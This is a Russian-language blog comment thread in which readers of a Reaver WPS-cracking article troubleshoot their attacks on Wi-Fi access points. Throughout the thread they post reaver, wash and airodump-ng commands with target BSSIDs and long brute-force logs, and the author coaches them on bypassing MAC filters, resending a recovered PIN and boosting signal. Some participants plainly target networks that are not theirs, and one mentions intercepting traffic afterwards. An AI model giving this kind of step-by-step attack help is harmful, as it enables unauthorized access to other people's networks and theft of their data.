    93,53 % comlete@2012-06-10 14:51:56(7 seconds/pin)
    93,58 % comlete@2012-06-10 14:55:34(7 seconds/pin)
    93,61 % comlete@2012-06-10 14:58:22(7 seconds/pin)
    93,64 % comlete@2012-06-10 15:03:12(8 seconds/pin)
    93,67 % comlete@2012-06-10 15:12:15(8 seconds/pin)

  • Cергей says:

    Спасибо большое, Серго!
    Все понял. Получилось.
    Только опять столкнулся с другой проблемой.
    Не выполняется команда apt-get update и соответственно не могу установить Reaver. Как мне кажется это из-за того что в BackTrack нужно настроить беспроводное соединение. Подскажите как. Я пробовал – ВТ ее не видит. Хотя это мой собственный Вай-Фай, которым я пользуюсь 2 годаю Следовательно дело не в железе. Подскажите как активитровать Вай-Фай через ВТ??? Заранее большое спасибо!!!

    • User says:

      Здесь обсуждение идет эксплойта reaver, а не того “как активировать Вай-Фай через BT”.

      • Серго says:

        Вы не правы,уважаемый User.Далеко не все здесь уверенные пользователи LINUX.Для того и форум,что бы разобрать проблему и дать или получить хороший совет.

        • Hub-lex says:

          Вообще то вы просто комментарии оставляете. Никакого форума нет.
          Коль стало так много комментариев, может быть действительно сделать форум или группу?

          • Cергей says:

            Было бы просто здорово!

          • Серго says:

            User назвал это обсуждением,я соответственно,форумом.:-)Действительно,уважаемый Hub-lex,создайте уже форум!Видите,сколько у Вас последователей!:-)

          • Hub-lex says:

            Ммм…ладно буду думать на эту тему. Что то создать по-любому придется.

    • алексей says:

      скачайте BackTrack 5 R2, в котором reaver уже установлен.и будет вам счастье…

    • Серго says:

      Сергей,Вы главное не спешите.:-) Для ВТ5R2 инет,действительно не нужен.Дали команду,покурите,попейте чайку или там ещё чего!:-)Видимо с DVD BT5 R2 работает медленно и долго думает.Я сам случайно это заметил,когда перенервничав пошёл покурить.Вернулся,глядь… Заработало! И правильно набирайте команды.Сам психовал,нервничал,присмотрелся… Лишнюю букву написал!:-)Вообщем,терпения Вам,тёзка!

  • Cергей says:

    To Алексей.
    Так и я пользуюсь ВТ5R2

    • алексей says:

      так и начинайте работать с реавером,он уже установлен и не надо ничего устанавливать

  • Ситуашка такая-сделал пошагово-вроде всё вери гуд.Выдал пароль за 9 сек.Но подключиться к вай-фай не получается.Попробую к другой точке.Плевать,слабая или нет.Хоть посмотрю-пины и пароли разные выдаёт,или как.С уважением.

  • Tigerslot says:

    Думаю, что Reaver v 1.3 по совместимости лучше с BackTrack 5 R2/BackTrack 5 R1. Reaver 1.4 на многих картах плохо работает в BackTrack?e. По крайней мере я уже не раз сталкивался с отзывами, что при таких сочетаниях:

    * один и тот же компьютер
    * одна и та же карта
    * BackTrack 5 R2/BackTrackR1 + Reaver 1.3

    1.3 не ошибается и не “виснет” на тех этапах, где 1.4 выдает ошибки или стопорится.
    Это можно отнести к таким же парадоскам, как и то, что в официальном списке чипсетов используемых для работы с Reaver, Netgear Wg 111 v 3 находится в списке неподдерживаемых. На самом же деле она пашет, при этом не смотря на маленькую мощность сигнала, но это как известно не показатель, так как мощность хороша при прямых соединениях, а для вардрайвинга важна исключительно чувствительность приема и здесь на данный момент chip RTL8187L один из лучших.

    p.s.: И кстати, есть еще Reaver Pro, не знаю насколько лучше модефицированный, но судя по отзывам он лучше подогнан под BackTrack 5 и почти не содержит багов, так, как подогнан Админом.

    • User says:

      С чего Ты взял, что у Netgear Wg 111 v. 3 чип – RTL8187L. Не RTL8187L а RTL8187B (www.wikidevi.com – загнляни на досуге).” а для вардрайвинга важна исключительно чувствительность приема и здесь на данный момент chip RTL8187L один из лучших”. Лучшего по определению не существует. Предпочтительнее всего конечно же выглядит Prism 2/2.5/3. Но карту на нем купить только на ebay.com, можно. Зачем лишний гемор. Удовлетворимся Рилтеком. Никто не говорит, что
      Realtek выпускает сплошь и рядом поганные чипсеты, но все же они спецификацию своих чипов открыли относительно не давно и то не полностью.

  • Пины и пароли выдаёт при повторном сканировании одинаковые.В данный момент после перезагрузки ноута завис на проверке удостоверения пользователя.Вроде,и к сети подключён-и зайти не могу.НЕ,хоть убейся-на 5 сек.идёт соединение,а потом разрыв.

  • Уважаемый Hub-lex,что Вы посоветуете в данном случае(моих два поста чуть выше)?Или,как Вы думаете-с чего бы это?

    • Hub-lex says:

      Посмотрите есть ли подключенные клиенты к АР.
      User, прав частично. Скорее всего МАС-фильтр.

  • User says:

    Может я не Hub-lex, но тем не менее. Может все что угодно быть. От отсутствия DHCP до элементарной фильтрации по mac-адресам.
    Вообще пасс – не столько для того, чтобы на redtube.com заглянуть, сколько для того чтобы перехватить, что-нибудь вкусное. А там уже на пороге SSL (не 1.0) или TLS встречает Тебя…

  • Canon says:

    Подскажите, что делать когда пишет такое?

    [+] Associated with C8:3A:35:0C:47:C1 (ESSID: Tenda)
    [+] Trying pin 00005678
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred

    • Hub-lex says:

      Могут быть 2 проблемы:
      1. стоит МАС-фильтр
      2. слабый уровень сигнала

      Покажите команды и их вывод.

  • boom says:

    а как роутер взломать?

    • Hub-lex says:

      Будет скоро написано несколько статей на эту тему. Примерно в начале след. недели.

  • Серго says:

    Приветствую! :-)
    Наблюдаю такую картину. Всё сделал как описано автором.Выбрал АР и начал ломать.Но процесс шёл медленно,иногда совсем замирал и надолго.Решил ради интереса запустить второе окно терминала на предмет сканирования других АР и их параллельного взлома.(так,ради интереса!:-)) Мне выдало несколько новых точек и я уж хотел запускать reaver,но! В первом окне прогресс начал стремительно расти. Пока оставил всё как есть,т.е. в одном окне ломается точка за которую взялся изначально,а второе так и открыто на предмет сканирования других точек.Уважаемый Hub-Lex! Можно всё оставить как есть,или всё-таки закрыть дополнительное окно терминала? Или подбор будет идти неправильно? Жду ответа.Заранее очень благодарен!:-)

    • Hub-lex says:

      Оставьте все как есть.
      Если проценты идут, значит все нормально.

      • Серго says:

        Спасибо за ответ! Медленно,правда идёт,но идёт.Интересно то,что закрывая терминал на котором идёт сканирование ,останавливается и процесс на терминале взлома.Запускаю сканирование,стартует и взлом.Прошедший дождик кстати,на некоторое время ускорил процесс!:-) Буду ждать результат!

        • Hub-lex says:

          На скорость взлома влияет уровень сигнала, а также железо на АР и компьютере.

          • Серго says:

            Абсолютно согласен.Перейдя по одной из Ваших ссылок,посетил иностранный сайт или форум.Там пишут,что иногда процесс может занимать до 4-ёх суток,а то и более.Но результат имеется.Так что ждуссс! И заодно уж ещё вопросик.Если на АР часто меняется канал,что сие означает? Просто при сканировании часто выдаёт то 1,то 9,то 6.Я не указал специально конкретный канал,предоставив reaver свободу выбора.Пока он справляется. Спасибо.

  • Ismail says:

    Спсибо за статью все работает у меня поучилось но он пароль смени по второй раз не могу это выдает вечно
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request

    • Hub-lex says:

      Покажите какую команду вводите.
      Если сменили пароль от wifi сети, тогда можно было бы послать пин еще раз.

      p.s.: мне кажется, что еще и МАС-фильтр поставили =)

  • haba-lexa says:

    Усиливаем сигнал адаптера:
    iwconfig wlan0 txpower 20-27
    Всё работает, только адаптер сильно греется(чип Atheros). Так что сначала думаем, а оно надо?

    • Hub-lex says:

      Можно воспользоваться антенной с хорошим (15-20 dbi) коэффициентом усиления.
      Ну а про нагревание адаптера, думаю все понятно.

  • Владимир says:

    Приветствую. У меня такая ситуация. Нашел сеть проверил ее командой WASH все ок. WPS не отключено. Использую сборку BackTrack 5 R2. Сигнал отличный уровень 80. Запустил взлом дошло до 70% и потом зациклился все время (часа 4) выдает
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    Остановил взлом. На следующий день решил начать все сначала (сесcию не сохранял) и опять зациклился но уже с самого начала т.е. с кода 01234567 сразу
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    Что делать помогите???

    • Hub-lex says:

      Покажите не только вывод, но и ввод. Какие команды вводили?

    • Серго says:

      Владимир,попробуйте как я. Откройте ещё одно окно терминала и наберите wash -i mon0 –scan
      При запуске терминала сканирования,начинает работать и терминал взлома.Так и работают в паре,один ломает,другой сканирует.Медленно очень,правда,но движется дело.Канал,на котором сидит АР не указывал,т.к. он периодически меняется.Всё как у автора.Терминал один

      reaver -i mon0 -b хх:хх:хх:хх:хх:хх -vv

      И во втором терминале

      wash -i mon0 –scan
      У меня работает.Надеюсь поможет и Вам.

  • Владимир says:

    вводил reaver -i mon0 -c 7 -b 00.00.00.хх.хх.хх -w

  • Tigerslot says:

    For User

    Я и не говорил, что он лучший, я сказал один из лучших, что касается чувствительности приема, по сравнению с тем же самым RT8070/RT3070.
    В Netgear wg111v2 чипсеты однозначно RTL8187, поэтому она и поддерживает работу с Reaver, не смотря на то, что находится в списке неподдерживаемых Reaver?ом карт (http://code.google.com/p/reaver-wps/wiki/SupportedWirelessDrivers), карт, но не чипсетов!
    Посмотрел по поводу указанных тобой предпочитаемых Prism 2/2.5/3, они случайно не в этих картах: Zyxel AG-225H V2 и 60466178991 / 251082782619 ? Номера внеси в поисковую строку на Ebay.com

    • User says:

      ZyXEL ZyAIR B-100, B-101, B-200, B-400 – точно на правильных чипсетах. Про Zyxel “AG-225H V2 и 60466178991 / 251082782619″ – сказать ничего не могу, но знаю что ZyXEL ZyAIR AG-200 (Atheros AR5523). Вот скажем совсем правильная карточка лежит: “SENAO PCMCIA WIFI CARD/NL-2511CD PLUS EXT2 /PRISM 2.5″ (там же).Prism 2.5 на борту, два MMCX-а, разумная цена ($15.53) – что еще надо?

  • Владимир says:

    Добрый день еще раз.
    Я вчера задавал вопрос по влому и поскольку мне так и не удалось запустить в нормальный режим то сегодня привожу алгоритм всех моих действий и их результат
    root@bt:~# iwconfig
    lo no wireless extensions.

    wlan0 IEEE 802.11bgn ESSID:off/any
    Mode:Managed Access Point: Not-Associated Tx-Power=19 dBm
    Retry long limit:7 RTS thr:off Fragment thr:off
    Encryption key:off
    Power Management:off

    eth0 no wireless extensions.

    root@bt:~# airmon-ng start wlan0

    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!

    PID Name
    2911 dhclient3
    2969 dhclient3
    Process with PID 2911 (dhclient3) is running on interface wlan0

    Interface Chipset Driver

    wlan0 Unknown brcmsmac – [phy0]
    (monitor mode enabled on mon0)

    root@bt:~# airodump-ng mon0
    CH 4 ][ Elapsed: 24 s ][ 2012-06-13 15:32

    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    1C:7E:E5:45:CA:хх -60 203 0 0 7 54e. WPA2 CCMP PSK BezPoni
    BSSID STATION PWR Rate Lost Frames Probe

    root@bt:~# wash -i mon0 -C

    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    BSSID Channel RSSI WPS Version WPS Locked ESSID
    ---------------------------------------------------------------------------------------------------------------
    1C:7E:E5:45:CA:хх 7 -43 1.0 No BezPoni
    ^C
    root@bt:~# reaver -i mon0 -b 1C:7E:E5:45:CA:хх -vv

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Waiting for beacon from 1C:7E:E5:45:CA:хх
    [+] Switching mon0 to channel 7
    [+] Associated with 1C:7E:E5:45:CA:9B (ESSID: BezPoni)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    ^C
    [+] Nothing done, nothing to save.
    root@bt:~# reaver -i mon0 -b 1C:7E:E5:45:CA:хх -c 7 -vv

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Switching mon0 to channel 7
    [+] Waiting for beacon from 1C:7E:E5:45:CA:хх
    [+] Associated with 1C:7E:E5:45:CA:9B (ESSID: BezPoni)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    ^C
    [+] Nothing done, nothing to save.
    root@bt:~# reaver -i mon0 -b 1C:7E:E5:45:CA:хх -c 7 -vv -A

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Switching mon0 to channel 7
    [+] Waiting for beacon from 1C:7E:E5:45:CA:хх
    [+] Associated with 1C:7E:E5:45:CA:9B (ESSID: BezPoni)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    ^C
    [+] Nothing done, nothing to save.
    root@bt:~#

    И снова прошу помощи

    • Hub-lex says:

      Это все? Проценты идут?

      Тут может быть несколько причин:
      1. включен МАС-фильтр
      2. не хватает сигнала

      Что показывает? (сначала запустить reaver, а после команду ниже и показать вывод)
      # dmesg | tail

  • Владимир says:

    Дело в том все так продолжаеться до бесконечности поэтому спустя 2 часа остановил. Менял МАС нечего не помогает, тоже зацикливаеться. Сигнал самый лучший
    1C:7E:E5:45:CA:хх 7 -43 1.0 No BezPon
    Попробую # dmesg | tail отпишусь.
    А как еще можно обойти МАС фильтр?

  • Владимир says:

    Нет тогда когда сканировал не было. А обхожу просто меняю свой на любой другой

    • Hub-lex says:

      Владимир, если делайте как сказали. Тогда вы не понимаете, как строится защита МАС-фильтра. И как ее обходить.
      Скоро появится подробная статья по этой теме. Если хотите узнать сразу, тогда skype => hub-lex-21

      • Владимир says:

        Приветствую. Интересная штука получаеться вчера запустил в очередной раз при тех же параметрах но дополнительно восползовался советом Серго
        reaver -i mon0 -b хх:хх:хх:хх:хх:хх -vv

        И во втором терминале

        wash -i mon0 –scan
        дело медленно но пошло. Потом отключил wash процесс пошел шустру на 1PIN 2секунды в таком темпе добрался до
        [+] 77.25% complete @ 2012-06-15 01:22:19 (3 seconds/pin)
        [+] Trying pin 84955678
        [!] WARNING: 25 successive start failures
        [!] WARNING: 10 failed connections in a row
        [+] Trying pin 84955678

        [+] Sending EAPOL START request
        [!] WARNING: Receive timeout occurred
        [+] Sending EAPOL START request
        [!] WARNING: Receive timeout occurred
        [!] WARNING: 25 successive start failures
        [+] Sending EAPOL START request
        [+] Sending WSC NACK
        [!] WPS transaction failed (code: 0×02), re-trying last p
        in
        [+] Trying pin 84955678
        [+] Sending EAPOL START request
        [!] WARNING: Receive timeout occurred
        [+] Sending EAPOL START request
        [!] WARNING: Receive timeout occurred
        [+] Sending EAPOL START request
        и так до бесконечности
        В связи с этим можно допустить что на АР нет МАС фильтра раз не банило до сих пор?
        Ну и традиционно что делать дальше уж больно не хочеться сдаваться раз уже дошел то 77% осталось то совсем немножко.
        Повторное включение wash в другом терминале результатов не дало.

  • Серго says:

    Получилось!:-)))) Времени правда ушло около 60-ти часов.Действовал как и писал выше.Т.е. полностью как описал автор,плюс запустил ещё один терминал на сканирование.Часов за 56 достиг 50%.Затем резкий скачок на 90% и ещё часа через 4-ре финиш!Терпение и выдержка победили.Это работает,подтверждаю.

    • User says:

      Хотел бы подкинуть страждущим, а они есть, одну тулзу: wpscrackgui_1.1.7-1_airubuntu. Зная первые шесть цифр mac-адреса, при определенном раскладе, она Тебе может выдать первые четыре цифры пина. Ну и соответственно процесс пойдет шустрее. Суть в том, что если первые шесть цифр mac-адреса одинаковые – то и первые четыре цифры пина у них тоже одинаковые (псевдослучайные числа). А вот с остальными четрьмя цифрами пина – пока сплошной туман. Ну и вводишь дальше по дефолту reaver -i monX -b X -p (то что она выдаст) – ну и enter ясен пень. 60-т часов – больно читать… Хоть я и не синтементальный чел., но все же… P. S. она не всесильна, но кое-что знает.

      • User says:

        Не всмысле что: “шесть цифр mac-адреса одинаковые” . А в том, что есть определенное соотношение между первыми шестью цифррами mac-а (XX:XX:XX) – с одной стороны. И четырьмя первыми цифрами пина (0000) с другой. И на основании первых шести значенеий mac-а можно узнать первые четыре цифры пина, что конечто-же облегчает задачу…P. S. Я не писатель, и никогда им не был.

        • ВЛАДИМИР says:

          Приветствую. Прежде всего хочу поблагодарить за статью и поддержку. Благодаря общим стараниям мне удалось подобрать пароль к двум сеткам. Соттветственно следующий вопрос относительно смены МАС для работы в инете под Виндой 7.

        • Серго says:

          Ну,это заметно,уважаемый User,что вы не писатель.Hub-lex уважаем и почитаем именно за то,что умеет правильно и толково подать материал по теме.Даже для абсолютных профанов,коих тут большинство!:-)))Вот из вашей абры-кадабры ничего толкового уяснить человеку несведущему очень сложно.А он очень мудр и терпелив абсолютно со всеми.Конечно,товарищи которые ленятся пролистать предыдущие коментарии вызывают некоторое раздражение.Так помогите им,а не выплёскивайте свой негатив.

      • Серго says:

        Ну,да! Ну 60-часов! Но результат-то есть. И это главное.От 13-го июня почитайте мои записи.

  • KOSTIAN says:

    Привет. Ломанул 2 сетки но на финише показывает только
    [+] 92.87% complete @ 2012-06-16 15:57:39 (3 seconds/pin)
    [+] Trying pin 16172074
    [+] Trying pin 16172081
    [+] Trying pin 16172098
    [+] Trying pin 16172104
    [+] WPS PIN: ’16172104′
    и в другой также естественно PIN другой.
    А вот долгожданного [+] WPA PSK: не дает.
    ПОМОГИТЕ ДОЙТИ ДО КОНЦА!!!

    • Hub-lex says:

      Покажите полный ввод и вывод. Мне трудно оперировать этими минимальными данными.
      Могу сказать, что пин подобран:
      [+] WPS PIN: ’16172104?
      Можно попробовать послать его напрямую:
      # reaver -i mon0 -b xx:xx:xx:xx:xx:xx -c x –pin=16172104

      • User says:

        Хотел спросить, если: ” Мне трудно оперировать этими минимальными данными.” То. Возможно ли как-нибудь упорядочить, порой однотипные вопросы… Я так пролистнул: и тьма, сплошная тьма. Порой совершенно однотипные вопросы задаются (copy -past – нам поможет). Можно ли как-нибудь упорядочить …? Я конечно не истина в последней инстанции… P. S. однотипные порой, весьма однотипные вопросы задаются…

        • Hub-lex says:

          на след. неделе будет FAQ по Reaver. куда войдут вопросы из комментариев, сообщения из скайпа и т.п.

          p.s.: главное чтобы в ВАШЕМ блоге все было упорядочено, а со своим я как нибудь разберусь.

        • KOSTIAN says:

          Привет. Формат команды был таким
          root@bt:~# reaver -i mon0 -b 94:0C:6D:FD:9A:16 -v -S -N -E

          вывод очень длинный поэтому привожу фрагментально

          [+] 8.94% complete @ 2012-06-16 15:08:08 (3 seconds/pin)
          [+] Trying pin 09735675
          [+] Trying pin 09745674
          [+] Trying pin 09755673
          [+] Trying pin 09765672
          [+] Trying pin 09775671
          [+] 8.98% complete @ 2012-06-16 15:08:32 (3 seconds/pin)
          [+] Trying pin 09785670
          [+] Trying pin 09795679
          [+] Trying pin 09805675
          [+] Trying pin 09815674
          [+] Trying pin 09825673
          [+] 9.03% complete @ 2012-06-16 15:08:57 (3 seconds/pin)
          [+] Trying pin 09835672
          [+] Trying pin 09845671
          [+] Trying pin 09855670
          [+] Trying pin 09865679
          [+] Trying pin 09875678
          [+] 9.07% complete @ 2012-06-16 15:09:12 (3 seconds/pin)

          [+] Trying pin 16095670
          [+] Trying pin 16105676
          [+] Trying pin 16115675
          [+] Trying pin 16125674
          [+] Trying pin 16135673
          [+] 14.75% complete @ 2012-06-16 15:44:49 (3 seconds/pin)
          [+] Trying pin 16145672
          [+] Trying pin 16155671
          [+] Trying pin 16165670
          [+] Trying pin 16175679
          [+] Trying pin 16170001
          [+] 90.93% complete @ 2012-06-16 15:45:08 (3 seconds/pin)

          [+] Trying pin 16172029
          [+] Trying pin 16172036
          [+] Trying pin 16172043
          [+] Trying pin 16172050
          [+] Trying pin 16172067
          [+] 92.87% complete @ 2012-06-16 15:57:39 (3 seconds/pin)
          [+] Trying pin 16172074
          [+] Trying pin 16172081
          [+] Trying pin 16172098
          [+] Trying pin 16172104
          [+] WPS PIN: ’16172104′
          ВОТ И ВСЕ.

          • Hub-lex says:

            Повторяю, пин подобран. Что выдаст эта команда?
            # reaver -i mon0 -b xx:xx:xx:xx:xx:xx -c x –pin=16172104

  • Андрей says:

    Здравствуйте. Прочитал вашу статью, пытаюсь хакнуть пароль, но сталкиваюсь с проблемой маленького сигнала… Процесс идет, но очень медленно, 5% примерно за 1-3 часа.
    Я в общем пользуюсь внешней Вай фай точкой доступа усиленной мощности
    2.4GHz High Power Wireless Outdoor CPE
    Model No. TL-WA5210G (TP-Link)
    (подключена через LAN порт)
    возможно ли проводить действия через нее а не через адаптер в ноутбуке?

  • TIR says:

    Здравствуйте Hub-lex! я так понял reaver не поможет если точка не поддерживает wps. подскажите пожалуйста где почитать про взлом без wps?

  • Андрей says:

    Здравствуйте. Прочитал вашу статью, пытаюсь хакнуть пароль, но сталкиваюсь с проблемой маленького сигнала… Процесс идет, но очень медленно, 5% примерно за 1-3 часа.
    Я в общем пользуюсь внешней Вай фай точкой доступа усиленной мощности
    2.4GHz High Power Wireless Outdoor CPE
    Model No. TL-WA5210G (TP-Link)
    (подключена через LAN порт)
    возможно ли проводить действия через нее а не через адаптер в ноутбуке?

  • CasilliaS says:

    Все не осилил, мб был этот вопрос, но после команды “airodump-ng mon0″ как написано, я не вижу список доступных беспроводных сетей… Есть надписи BSSID PWR и так далее, но под ними пусто, SOS!!

    • Hub-lex says:

      Показывайте, что вводили и что получили.

      • CasilliaS says:

        root@bt:~# iwconfig
        lo no wireless extensions.

        wlan0 IEEE 802.11bgn ESSID:off/any
        Mode:Managed Access Point: Not-Associated Tx-Power=19 dBm
        Retry long limit:7 RTS thr:off Fragment thr:off
        Encryption key:off
        Power Management:off

        eth0 no wireless extensions.

        root@bt:~# airmon-ng start wlan0

        Found 2 processes that could cause trouble.
        If airodump-ng, aireplay-ng or airtun-ng stops working after
        a short period of time, you may want to kill (some of) them!

        PID Name
        4023 dhclient3
        4094 dhclient3
        Process with PID 4094 (dhclient3) is running on interface wlan0

        Interface Chipset Driver

        wlan0 Unknown brcmsmac – [phy0]
        (monitor mode enabled on mon0)

        root@bt:~# airo

        root@bt:~# iwconfig
        lo no wireless extensions.

        wlan0 IEEE 802.11bgn ESSID:off/any
        Mode:Managed Access Point: Not-Associated Tx-Power=19 dBm
        Retry long limit:7 RTS thr:off Fragment thr:off
        Encryption key:off
        Power Management:off

        eth0 no wireless extensions.

        root@bt:~# airmon-ng startwlan0

        usage: airmon-ng [channel or frequency]

        root@bt:~# airmon-ng start wlan0

        Found 2 processes that could cause trouble.
        If airodump-ng, aireplay-ng or airtun-ng stops working after
        a short period of time, you may want to kill (some of) them!

        PID Name
        4023 dhclient3
        4094 dhclient3
        Process with PID 4094 (dhclient3) is running on interface wlan0

        Interface Chipset Driver

        wlan0 Unknown brcmsmac – [phy0]
        (monitor mode enabled on mon0)

        root@bt:~# airodump-ng mon0

        CH 5 ][ BAT: 1 hour 20 mins ][ Elapsed: 16 s ][ 2012-06-23 13:38

        BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

        BSSID STATION PWR Rate Lost Frames Probe

        root@bt:~#

        • Hub-lex says:

          покажите что выдает команда lspci

          • CasilliaS says:

            root@bt:~# lspci
            00:00.0 Host bridge: Intel Corporation 2nd Generation Core Processor Family DRAM Controller (rev 09)
            00:01.0 PCI bridge: Intel Corporation Xeon E3-1200/2nd Generation Core Processor Family PCI Express Root Port (rev 09)
            00:02.0 VGA compatible controller: Intel Corporation 2nd Generation Core Processor Family Integrated Graphics Controller (rev 09)
            00:16.0 Communication controller: Intel Corporation 6 Series/C200 Series Chipset Family MEI Controller #1 (rev 04)
            00:1a.0 USB Controller: Intel Corporation 6 Series/C200 Series Chipset Family USB Enhanced Host Controller #2 (rev 05)
            00:1b.0 Audio device: Intel Corporation 6 Series/C200 Series Chipset Family High Definition Audio Controller (rev 05)
            00:1c.0 PCI bridge: Intel Corporation 6 Series/C200 Series Chipset Family PCI Express Root Port 1 (rev b5)
            00:1c.1 PCI bridge: Intel Corporation 6 Series/C200 Series Chipset Family PCI Express Root Port 2 (rev b5)
            00:1c.2 PCI bridge: Intel Corporation 6 Series/C200 Series Chipset Family PCI Express Root Port 3 (rev b5)
            00:1d.0 USB Controller: Intel Corporation 6 Series/C200 Series Chipset Family USB Enhanced Host Controller #1 (rev 05)
            00:1f.0 ISA bridge: Intel Corporation HM65 Express Chipset Family LPC Controller (rev 05)
            00:1f.2 SATA controller: Intel Corporation 6 Series/C200 Series Chipset Family 6 port SATA AHCI Controller (rev 05)
            00:1f.3 SMBus: Intel Corporation 6 Series/C200 Series Chipset Family SMBus Controller (rev 05)
            01:00.0 VGA compatible controller: ATI Technologies Inc NI Seymour [AMD Radeon HD 6470M]
            02:00.0 Network controller: Broadcom Corporation BCM4313 802.11b/g/n Wireless LAN Controller (rev 01)
            03:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8101E/RTL8102E PCI Express Fast Ethernet controller (rev 05)
            04:00.0 Unassigned class [ff00]: Realtek Semiconductor Co., Ltd. Device 5209 (rev 01)

  • CasilliaS says:

    Все перечисленные действия нужно осуществлять с подключением к инету? Просто я БэкТрэк с USB запускаю, и запомнит ли оно все что я установил из дому?

    • Hub-lex says:

      Да, нужно быть подключенным к Сети. Остальные вопросы такой тематики ищите в Сети.

  • Max says:

    Доброго дня!
    hub-lex скажи пожалуйста,что делать в данном случае-
    reaver-i mon0-b xx:xx:xx:xx:xx:xx -vv
    reaver-i:command not found
    Спасибо!

  • Max says:

    BT5R2-GNOME-64

  • Max says:

    Всего лишь?Надеюсь сработает!
    Спасибо!

    • Hub-lex says:

      Тут не надо надеяться, надо просто пробелы поставить =)
      кстати, между mon0 и -b тоже поставить пробел.

  • Max says:

    Извиняюсь за беспокойство,но нужны знания “профи”
    Значит пробелы сработали и потекли такие строки:
    [+]waiting for beacon from xx:xx:xx:xx:xx:xx
    [+]switching mon0 to channel 1
    [+]switching mon0 to channel 2 и так до 14-ти,после чего ничего не происходит.
    Поскольку в твоей статье ничего не сказано про этот этап,нам остаёться лишь спрашивать у “профи”
    Спасибо

    • Hub-lex says:

      хаха “профи”. идет смена канала. все что нужно, указать канал, на котором работает АР. Например:
      # reaver -i mon0 -c [номер_канала] -b xx:xx:xx:xx:xx:xx -vv

  • Max says:

    То есть номер сети,которую взл.?
    Следуют ли далее какие нибудь манипуляции?
    Спасибо

    • Hub-lex says:

      Не номер сети (это как вообще), а номер канала. Покажи, что выдает airodump-ng mon0
      Не знаю, у каждого по разному.

  • Max says:

